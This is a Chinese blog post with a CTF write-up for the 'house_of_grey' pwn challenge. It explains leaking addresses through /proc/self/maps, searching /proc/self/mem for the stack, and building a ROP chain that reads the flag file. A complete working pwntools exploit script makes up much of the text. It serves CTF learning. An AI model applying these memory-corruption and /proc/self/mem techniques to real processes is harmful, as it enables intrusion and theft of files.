攻防世界PWN之house_of_grey题解

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量1.8k 收藏 6
点赞数 5
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103460546
版权
pwn 同时被 3 个专栏收录
161 篇文章 26 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏

house_of_grey

首先,检查一下程序的保护机制,发现保护全开

然后,我们用IDA分析一下

发现是一个读取文件并显示的程序,除了flag文件,其他文件都可以读取

程序有个缓冲区溢出漏洞

可以溢出,修改v8指针,然后我们就可以利用功能4,实现任意地址写

由于可以读取除了flag之外的文件,那么我们可以读取/proc/self/maps文件

Linux 内核提供了一种通过 /proc 文件系统,在运行时访问内核内部数据结构、改变内核设置的机制。proc文件系统是一个伪文件系统,它只存在内存当中,而不占用外存空间。读取/proc/self/maps可以得到当前进程的内存映射关系,通过读该文件的内容可以得到内存代码段基址。/proc/self/mem是进程的内存内容通过修改该文件相当于直接修改当前进程的内存。该文件不能直接读取,需要结合maps的映射信息来确定读的偏移值。即无法读取未被映射的区域,只有读取的偏移值是被映射的区域才能正确读取内存内容。

同样的,我们也可以通过写入mem文件来直接写入内存,例如直接修改代码段,放入我们的shellcode,从而在程序流程执行到这一步时执行shellcode来拿shell

那么,我们先来测试一下

我们得到了各个段的地址,由此,我们可以绕过PIE,以及利用/proc/self/mem来读取任意地址的内容。

为了确定本程序能否getshell,我们检测一下execve系统调用有没有被禁用

发现execve被禁用,那么我们就不能用system这些来getshell,我们可以构造ROP,把flag文件读取到内存中,再输出来。

然后,我们再看看程序

程序最后有一个exit(0),由此,覆盖fn函数的返回地址来构造ROP不可行,我们可以覆盖read函数的返回地址,也就是调用read任意写时,把自己的返回地址给覆盖了,这样ROP写入后就直接开始执行了。为了覆盖read的返回地址,我们就需要确定栈的地址。

但是,由于程序是clone出来的,第三个参数指定了clone出的进程的栈地址,程序一开始用mmap映射了一段内存,然后取了其中的一个随机的位置传给了clone,由此,我们不知道程序的栈地址。但是,我们可以通过读取/proc/self/mem文件,来搜索标记,已确定程序的栈地址。

标记就是”/proc/self/maps”字符串,因为buf里保存了这个字符串,当我们在内存中搜索到这个字符串时,当前位置就是buf的栈地址,由此,我们就可以计算出其他的栈地址。

那么,我们先来获取一些需要的地址信息

  1. enterRoom()  
  2. setPath('/proc/self/maps')  
  3. readSomething(2000)  
  4. sh.recvuntil('You get something:\n')  
  5. #解析程序的加载地址,以及mmap内存出的地址  
  6. elf_base = int(sh.recvuntil('-').split('-')[0],16)  
  7. pop_rdi = elf_base + pop_s_rdi  
  8. pop_rsi = elf_base + pop_s_rsi  
  9. open_addr = elf_base + open_s_plt  
  10. read_addr = elf_base + read_s_plt  
  11. puts_addr = elf_base + puts_s_plt  
  12.   
  13. while True:  
  14.    line = sh.recvline()  
  15.    if 'heap' in line:  
  16.       #接下来这一行就是mmap出的内存的信息  
  17.       line = sh.recvline()  
  18.       mmap_start = int(line.split('-')[0],16)  
  19.       mmap_end = int(line.split('-')[1].split(' ')[0],16)  
  20.       break  
  21.   

接下来,我们就需要读取/proc/self/mem来搜索内存,确定栈地址了

程序只能执行30次功能调用,之前已经用了4次,最后我们还需要用2次,那么我们搜索就最多24次,

而我们每次最多允许读取100000个字节的数据,由此,我们能搜索2400000个字节的内容,通过IDA调试,观察buf的栈地址,计算它与mmap_end的值的差值,做一个大致的范围,由于栈是从高往低增长的,因此,我们应该从mmap_end – x ~ mmap_end搜索,其中x是一个范围。

那么,我们就开始搜索吧

  1. #现在解析出clone的那个程序的stack地址  
  2. stack_end = mmap_end  
  3. stack_start = mmap_start  
  4.   
  5. #范围偏差  
  6. offset = 0xf800000  
  7. #区间范围begin_off~stack_end里搜索  
  8. begin_off = stack_end - offset - 24 * 100000  
  9. setPath('/proc/self/mem')  
  10. seekTo(begin_off)  
  11. print 'begin->',hex(begin_off),'to',hex(stack_end)  
  12. #在内存的范围内搜索,如果找到了/proc/self/mem这个字符串,说明当前地址就是buf的栈地址  
  13. for i in range(0,24):  
  14.    readSomething(100000)  
  15.    content = sh.recvuntil('1.Find ')[:-7]  
  16.    if '/proc/self/mem' in content:  
  17.       print 'found!'  
  18.       arr = content.split('/proc/self/mem')[0]  
  19.       break  
  20. if i == 23:  
  21.    print '未能成功确定v8的地址,请重试!'  
  22.    exit(0)  
  23.   
  24. #获得了v8的地址,可以将它里面的内容,实现任意地址写  
  25. v8_addr = begin_off + i * 100000 + len(arr) + 5  
  26. print 'v8 addr=',hex(v8_addr)  
  27. read_ret = v8_addr - 0x50  

现在,得到了存放read的返回地址的栈地址,我们就可以写ROP了

  1. #覆盖v8指针内容为存放read返回地址的栈地址  
  2. payload = '/proc/self/mem'.ljust(24,'\x00') + p64(read_ret)  
  3. setPath(payload)  
  4. #接下来,我们可以写rop(v8_addr-24+15处就是/home/ctf/flag字符串)  
  5. rop = p64(pop_rdi) + p64(read_ret + 15 * 8) + p64(pop_rsi) + p64(0) + p64(0) + p64(open_addr)  
  6. #我们打开的文件,描述符为6  
  7. rop += p64(pop_rdi) + p64(6) + p64(pop_rsi) + p64(read_ret + 15 * 8) + p64(0) + p64(read_addr)  
  8. rop += p64(pop_rdi) + p64(read_ret + 15 * 8) + p64(puts_addr)  
  9. rop += '/home/ctf/flag\x00'  
  10.   
  11. giveSomething(rop)  

然后,我们就得到了flag

综上,我们的exp脚本如下

  1. #coding:utf8  
  2. from pwn import *  
  3.   
  4. sh = process('./pwnh35')  
  5. #sh = remote('111.198.29.45',37518)  
  6. elf = ELF('./pwnh35')  
  7. libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')  
  8. open_s_plt = elf.plt['open']  
  9. read_s_plt = elf.plt['read']  
  10. puts_s_plt = elf.plt['puts']  
  11. #pop rdi  
  12. #pop r15  
  13. #retn  
  14. pop_s_rsi = 0x1821  
  15. #pop rdi  
  16. #retn  
  17. pop_s_rdi = 0x1823  
  18.   
  19. def enterRoom():  
  20.    sh.sendlineafter('Do you want to help me build my room? Y/n?\n','Y')  
  21.   
  22. def setPath(content):  
  23.    sh.sendlineafter('5.Exit\n','1')  
  24.    sh.sendlineafter('So man, what are you finding?\n',content)  
  25.   
  26. def seekTo(pos):  
  27.    sh.sendlineafter('5.Exit\n','2')  
  28.    sh.sendlineafter('So, Where are you?\n',str(pos))  
  29.   
  30. def readSomething(length):  
  31.    sh.sendlineafter('5.Exit\n','3')  
  32.    sh.sendlineafter('How many things do you want to get?\n',str(length))  
  33.   
  34. def giveSomething(content):  
  35.    sh.sendlineafter('5.Exit\n','4')  
  36.    sh.sendlineafter('content:',content)  
  37.   
  38. enterRoom()  
  39. setPath('/proc/self/maps')  
  40. readSomething(2000)  
  41. sh.recvuntil('You get something:\n')  
  42. #解析程序的加载地址,以及mmap内存出的地址  
  43. elf_base = int(sh.recvuntil('-').split('-')[0],16)  
  44. pop_rdi = elf_base + pop_s_rdi  
  45. pop_rsi = elf_base + pop_s_rsi  
  46. open_addr = elf_base + open_s_plt  
  47. read_addr = elf_base + read_s_plt  
  48. puts_addr = elf_base + puts_s_plt  
  49.   
  50. while True:  
  51.    line = sh.recvline()  
  52.    if 'heap' in line:  
  53.       #接下来这一行就是mmap出的内存的信息  
  54.       line = sh.recvline()  
  55.       mmap_start = int(line.split('-')[0],16)  
  56.       mmap_end = int(line.split('-')[1].split(' ')[0],16)  
  57.       break  
  58.   
  59. #现在解析出clone的那个程序的stack地址  
  60. stack_end = mmap_end  
  61. stack_start = mmap_start  
  62.   
  63. #范围偏差  
  64. offset = 0xf800000  
  65. #区间范围begin_off~stack_end里搜索  
  66. begin_off = stack_end - offset - 24 * 100000  
  67. setPath('/proc/self/mem')  
  68. seekTo(begin_off)  
  69. print 'begin->',hex(begin_off),'to',hex(stack_end)  
  70. #在内存的范围内搜索,如果找到了/proc/self/mem这个字符串,说明当前地址就是buf的栈地址  
  71. for i in range(0,24):  
  72.    readSomething(100000)  
  73.    content = sh.recvuntil('1.Find ')[:-7]  
  74.    if '/proc/self/mem' in content:  
  75.       print 'found!'  
  76.       arr = content.split('/proc/self/mem')[0]  
  77.       break  
  78. if i == 23:  
  79.    print '未能成功确定v8的地址,请重试!'  
  80.    exit(0)  
  81.   
  82. #获得了v8的地址,可以将它里面的内容,实现任意地址写  
  83. v8_addr = begin_off + i * 100000 + len(arr) + 5  
  84. print 'v8 addr=',hex(v8_addr)  
  85. read_ret = v8_addr - 0x50  
  86. #覆盖v8指针内容为存放read返回地址的栈地址  
  87. payload = '/proc/self/mem'.ljust(24,'\x00') + p64(read_ret)  
  88. setPath(payload)  
  89. #接下来,我们可以写rop(v8_addr-24+15处就是/home/ctf/flag字符串)  
  90. rop = p64(pop_rdi) + p64(read_ret + 15 * 8) + p64(pop_rsi) + p64(0) + p64(0) + p64(open_addr)  
  91. #我们打开的文件,描述符为6  
  92. rop += p64(pop_rdi) + p64(6) + p64(pop_rsi) + p64(read_ret + 15 * 8) + p64(0) + p64(read_addr)  
  93. rop += p64(pop_rdi) + p64(read_ret + 15 * 8) + p64(puts_addr)  
  94. rop += '/home/ctf/flag\x00'  
  95.   
  96. giveSomething(rop)  
  97.   
  98. sh.interactive()  

本题,我对maps和mem文件有了进一步的了解,其中maps文件里有程序的加载地址信息,mem是程序的内存映射。

ha1vk
关注
专栏目录
攻防世界pwnhouse_of_grey——Linux系统文件初探
PLpa的博客
03-06 1047
前言: 此题涉及到Linux的两个系统文件:maps和mem,不了解的可以看科普(传送门)。 64位,保护全开,打开IDA64看看程序到底是怎么设计的。 可以看到程序首先打开系统,然后用mmap映射了一片区域,并对fn函数进行操作,我们双击进入fn函数看看情况: fn函数里边又5个功能,没个功能都有用途,分析一下每个功能: 第一个功能从字面意思看就知道是用来定位文件,然后打开他,但是不能打...
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1656
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界-PWN-house of grey-Linux系统文件泄漏
aptx4869_li的博客
05-02 921
解题思路 文章目录解题思路检查保护机制漏洞利用分析关于`seccomp`(Sandbox的安全机制)什么是seccomp如何使用seccomp如何查看程序是否开启了seccomp保护机制利用思路整理解题脚本执行结果 检查保护机制 healer@healer-virtual-machine:~/Desktop/house_of_grey$ readelf -h house_of_grey ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00
CTF-PWN-HouseOfGrey(栈溢出+maps泄露地址+mem泄露内存)
SuperGate的博客
01-27 1244
程序概述 [*] '/home/supergate/Desktop/Pwn/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 查看程序保护后发现保护全开 supergate...
CTF-web xman-2018 第八天 web 模板注入 序列化执行
iamsongyu的博客
01-05 3789
    python代码审计 php包容性更大的语言,针对web,简单一些所以大家用这个 python出现后,更加的中性一些,有更多的库,以其为技术基础的东西也很多,比如flask模板等。 企业中java多,但是不适合初学者,调用栈特别多,反序列化,表达式执行。   对于没遇到过的题目,要会收集信息,百度不行还是用谷歌。 学会用英文搜索,而且新很多,谷歌的高级技巧(定向搜索,源码搜...
Linux下/proc目录简介
weixin_34376562的博客
01-25 1458
Linux下/proc目录简介 1. /proc目录 Linux 内核提供了一种通过 /proc 文件系统,在运行时访问内核内部数据结构、改变内核设置的机制。proc文件系统是一个伪文件系统,它只存在内存当中,而不占用外存空间。它以文件系统的方式为访问系统内核数据的操作提供接口。 用户和应用程序可以通过proc得到系统的信息,并可以改变内核的某些参数。由于系统的信息,如...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界pwn-int_overflow】
a_silly_coder的博客
05-14 306
下载文件后首先检查保护,发现不存在canary,可以进行栈溢出。 将文件拖入ida32位进行查看,发现是一个简单的登录。 首先在login()中输入账号和密码,发现passwd存在buf中,可输入长度有0x199,然后传入check_passwd()函数中。 然后在check_passwd中将0x199长度的buf复制给dest,但是dest距离ebp只有0x14,我们也在文件中发现了cat flag的函数,所以思路就很清晰了,在输入密码时,输入一个长字符串,在check_passwd函数..
2020-11-09学习记录:攻防世界pwn之echo_back
eeeeeight的博客
11-09 291
今天就算是世界毁灭,我也要更新博客,容我先睡一觉
取当前进程对应之静态映像文件的绝对路径/proc/self/exe
01-14 1621
提供一个linux  advanced programming 上的得到绝对路径目录的函数: char* get_self_executable_directory () {   int rval;   char link_target[1024];//目标地址   char* last_slash;   size_t result_length;//结果的长度   char* re
Linux用户空间将虚拟地址转化为物理地址
RToax
10-09 5579
内存由大量word或array组成,每个word或array都有与之关联的地址。现在,CPU的工作是从基于内存的程序计数器中获取指令。现在,这些指令可能会导致加载或存储到特定的存储器地址。地址绑定是从一个地址空间映射到另一地址空间的过程。逻辑地址是CPU在执行过程中生成的地址,而物理地址是指存储单元(已加载到内存中的单元)中的位置。请注意,用户仅处理逻辑地址(虚拟地址)。逻辑地址尤其由MMU或地址转换单元进行转换。该过程的输出是适当的物理地址或代码/数据在RAM中的位置。
PWN-COMPETITION-HGAME2022-Week2
P1umH0的博客
02-04 1889
PWN-COMPETITION-HGAME2022-Week2blind(unsolved)echo_severoldfashion_note blind(unsolved) echo_sever 堆上的格式化字符串漏洞 当输入的v0为0时,realloc(ptr,0)相当于free(ptr) 于是考虑将free_hook写为one-gadget # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" io=process(".
/proc/self/目录的意义
热门推荐
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...
open表和closed表_劫持got表绕过disable_functions
weixin_39559559的博客
11-24 813
最近阅读了芝士狍子糕师傅写的针对宝塔的RASP及其disable_functions的绕过的文章。觉得其中劫持got表来绕过disable_functions的方法还是比较有意思的,对于web手来说也是比较好理解的。这里通过web手的视角来理解这种绕过disable_functions的方法。前置知识/proc目录Linux系统上的/proc目录是一种文件系统,即proc文件系统。/pr...
PWNHouse of Lore&House of Rabbit
u014377094的博客
05-04 3920
House of lore House of lore是一种利用small bin的利用方法。 前面我们通过修改unsorted bin与large bin的bk(bk_nextsize)位来造成对”任意“地址的更改。unsorted bin由于修改后,如果无法妥善处理bk指向的chunk的size位、bk位,会造成unsorted bin无法再使用,largebin由于是通过fd_nextsize来便利的,所以下次放入影响会小,而下次取出,假如可取出比修改的chunk小的chunk,还可以继续使用。以
[总结型]记CTF PWN中过气的堆利用
easy_level1的博客
04-15 1641
目录前言不再好用的unsorted bin attack不可能的tcache double free 前言 how2heap(https://github.com/shellphish/how2heap)可以说是目前"权威"的glibc中的heap exploitation techniques文档。在学术界近年的一些顶会文章也有引用这个github项目。 攻防对抗是一直持续发展的,很容易在学习中,复现一些过时的攻击技术出现困难,原因就是已经有补丁打上了。本文大致总结一些在比赛中常见的过时技术,持续更新…吧
CTF PWN-攻防世界Overflow整数溢出漏洞
最新发布
道阻且长,行则将至。
07-29 1892
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解
小哈里的博客
01-12 5666
序 1、level0 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 题目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
32c3 ctf writeup
ling
12-30 1625
write by ling. 32c3 ctf总共做了3个题目,简单记录一下。 1. forth 只给了一个ip和端口,通过回显信息知道是yforth,网上直接下到了对应的源码。 在源码中搜索system,找到了如下函数: yforth支持的命令都用一个code的宏定义出来。 分析_system函数,发现需要带2个参数,一个为执行命令的地址,一个为执行命
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值